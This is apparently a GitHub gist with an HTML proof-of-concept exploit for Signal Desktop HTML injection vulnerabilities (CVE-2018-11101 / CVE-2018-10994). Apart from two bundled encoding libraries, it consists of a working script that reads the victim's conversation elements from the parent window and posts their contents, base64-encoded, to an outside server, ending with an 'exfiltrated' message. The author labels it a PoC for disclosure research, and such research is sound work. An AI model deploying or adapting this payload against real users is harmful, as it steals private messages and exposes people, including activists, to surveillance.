Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
PoC to exfiltrate signal-desktop messages exploiting CVE-2018-11101 or CVE-2018-10994
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
<!--
DO NOT USE THIS IN REAL LIFE, IT'S JUST A POC! Be nice, don't hack activists :)
by HacKan: https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection-variant-2
under GNU GPL v3.0+
-->
</head>
<body>
<div id="content-8508a212-f263-4266-bea4-08b46dabe70d">Pwoning in process...</div>
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<!-- base64js: https://github.com/beatgammit/base64-js/blob/master/base64js.min.js -->
<script>
(function(r){if(typeof exports==="object"&&typeof module!=="undefined"){module.exports=r()}else if(typeof define==="function"&&define.amd){define([],r)}else{var e;if(typeof window!=="undefined"){e=window}else if(typeof global!=="undefined"){e=global}else if(typeof self!=="undefined"){e=self}else{e=this}e.base64js=r()}})(function(){var r,e,n;return function(){function r(e,n,t){function o(f,i){if(!n[f]){if(!e[f]){var u="function"==typeof require&&require;if(!i&&u)return u(f,!0);if(a)return a(f,!0);var v=new Error("Cannot find module '"+f+"'");throw v.code="MODULE_NOT_FOUND",v}var d=n[f]={exports:{}};e[f][0].call(d.exports,function(r){var n=e[f][1][r];return o(n||r)},d,d.exports,r,e,n,t)}return n[f].exports}for(var a="function"==typeof require&&require,f=0;f<t.length;f++)o(t[f]);return o}return r}()({"/":[function(r,e,n){"use strict";n.byteLength=d;n.toByteArray=h;n.fromByteArray=p;var t=[];var o=[];var a=typeof Uint8Array!=="undefined"?Uint8Array:Array;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";for(var i=0,u=f.length;i<u;++i){t[i]=f[i];o[f.charCodeAt(i)]=i}o["-".charCodeAt(0)]=62;o["_".charCodeAt(0)]=63;function v(r){var e=r.length;if(e%4>0){throw new Error("Invalid string. Length must be a multiple of 4")}var n=r.indexOf("=");if(n===-1)n=e;var t=n===e?0:4-n%4;return[n,t]}function d(r){var e=v(r);var n=e[0];var t=e[1];return(n+t)*3/4-t}function c(r,e,n){return(e+n)*3/4-n}function h(r){var e;var n=v(r);var t=n[0];var f=n[1];var i=new a(c(r,t,f));var u=0;var d=f>0?t-4:t;for(var h=0;h<d;h+=4){e=o[r.charCodeAt(h)]<<18|o[r.charCodeAt(h+1)]<<12|o[r.charCodeAt(h+2)]<<6|o[r.charCodeAt(h+3)];i[u++]=e>>16&255;i[u++]=e>>8&255;i[u++]=e&255}if(f===2){e=o[r.charCodeAt(h)]<<2|o[r.charCodeAt(h+1)]>>4;i[u++]=e&255}if(f===1){e=o[r.charCodeAt(h)]<<10|o[r.charCodeAt(h+1)]<<4|o[r.charCodeAt(h+2)]>>2;i[u++]=e>>8&255;i[u++]=e&255}return i}function s(r){return t[r>>18&63]+t[r>>12&63]+t[r>>6&63]+t[r&63]}function l(r,e,n){var t;var o=[];for(var a=e;a<n;a+=3){t=(r[a]<<16&16711680)+(r[a+1]<<8&65280)+(r[a+2]&255);o.push(s(t))}return o.join("")}function p(r){var e;var n=r.length;var o=n%3;var a=[];var f=16383;for(var i=0,u=n-o;i<u;i+=f){a.push(l(r,i,i+f>u?u:i+f))}if(o===1){e=r[n-1];a.push(t[e>>2]+t[e<<4&63]+"==")}else if(o===2){e=(r[n-2]<<8)+r[n-1];a.push(t[e>>10]+t[e>>4&63]+t[e<<2&63]+"=")}return a.join("")}},{}]},{},[])("/")});
</script>
<!-- textencoder: https://github.com/coolaj86/TextEncoderLite/blob/master/text-encoder-lite.min.js -->
<script>
function TextEncoderLite(){}function TextDecoderLite(){}(function(){'use strict';function utf8ToBytes(a,b){b=b||Infinity;for(var c,d=a.length,e=null,f=[],g=0;g<d;g++){if(c=a.charCodeAt(g),!(55295<c&&57344>c))e&&(-1<(b-=3)&&f.push(239,191,189),e=null);else if(e){if(56320>c){-1<(b-=3)&&f.push(239,191,189),e=c;continue}else c=65536|(e-55296<<10|c-56320),e=null;}else if(56319<c){-1<(b-=3)&&f.push(239,191,189);continue}else if(g+1===d){-1<(b-=3)&&f.push(239,191,189);continue}else{e=c;continue}if(128>c){if(0>(b-=1))break;f.push(c)}else if(2048>c){if(0>(b-=2))break;f.push(192|c>>6,128|63&c)}else if(65536>c){if(0>(b-=3))break;f.push(224|c>>12,128|63&c>>6,128|63&c)}else if(2097152>c){if(0>(b-=4))break;f.push(240|c>>18,128|63&c>>12,128|63&c>>6,128|63&c)}else throw new Error('Invalid code point')}return f}function utf8Slice(a,b,c){var d='',e='';c=Math.min(a.length,c||Infinity),b=b||0;for(var f=b;f<c;f++)127>=a[f]?(d+=decodeUtf8Char(e)+String.fromCharCode(a[f]),e=''):e+='%'+a[f].toString(16);return d+decodeUtf8Char(e)}function decodeUtf8Char(a){try{return decodeURIComponent(a)}catch(b){return String.fromCharCode(65533)}}TextEncoderLite.prototype.encode=function(a){var b;return b='undefined'==typeof Uint8Array?utf8ToBytes(a):new Uint8Array(utf8ToBytes(a)),b},TextDecoderLite.prototype.decode=function(a){return utf8Slice(a,0,a.length)}})();
</script>
<script>
<!--
// https://developer.mozilla.org/en-US/docs/Web/API/WindowBase64/Base64_encoding_and_decoding#The_Unicode_Problem
function Base64Encode(str, encoding = 'utf-8') {
var bytes = new (TextEncoder || TextEncoderLite)(encoding).encode(str);
return base64js.fromByteArray(bytes);
}
function postData(url, key, data) {
$.post(url, {data: Base64Encode(data), key: key}, function(status) {
$('#content-8508a212-f263-4266-bea4-08b46dabe70d').html($('#content-8508a212-f263-4266-bea4-08b46dabe70d').html() + "\nData exfiltrated! You have been PWONED");
});
}
$(document).ready(function() {
// here's the fastest way I saw to find conversation, although is by far not the best one...
var MAX = 10000;
for (var i=0; i<MAX; i++) {
var conversation = parent.document.getElementById('conversation-c' + i);
//$('#content-8508a212-f263-4266-bea4-08b46dabe70d').html('conv: ' + conversation);
if (conversation != null) {
var data = conversation.innerHTML || 'NO DATA :(';
postData(
'https://ivan.barreraoro.com.ar/signal/index.php',
'mchrmhiossrgxhxis',
data,
)
}
}
});
-->
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.